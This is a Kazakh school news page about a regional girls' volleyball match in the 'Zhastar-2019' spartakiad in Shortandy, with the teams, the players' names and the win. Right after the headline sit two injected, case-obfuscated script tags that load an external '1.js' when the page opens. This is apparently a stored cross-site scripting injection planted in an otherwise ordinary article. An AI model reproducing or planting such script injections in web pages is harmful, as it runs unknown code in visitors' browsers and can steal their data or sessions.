"Жастар-2019" облыстық спартакиада<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.02.2019

27 ақпан күні Шортанды кентінде  "Жастар-2019" облыстық спартакиадасының аясында волейболдан оқушы қыздар арасында облыстық аймақтық ойындар өтті. Ойынға келесі командалар қатысты: Шортанды ауданы, Аршалы ауданы, Аккөл ауданы және Степногорск қаласы (өкінішке орай Бұланды ауданы келе алмады). Шортанды ауданының құрама командасында Бозайғыр орта мектебінің келесі оқушылары ойнады: Бекен Ақмарал, Болтай Айгүл, Бадыкова Дильназ, Арыстан Саида, Нұрлыбек Дильназ, Оралхан Айгерим - жаттықтырушысы Бозайғыр орта мектебінің дене тәрбиесінің мұғалімі  Шаймагамбетов Серик Демесинович.

Тартысты өткен ойындарда Шортанды ауданының құрама командасы I орынға ие болып финалға жолдама алды. Ойыншыларымызды құттықтап, ақтық ойындарда тек жеңіс тілейміз!

 

Просмотров: 738


Пікір қосу



Деректерді қолтаңбаға қосу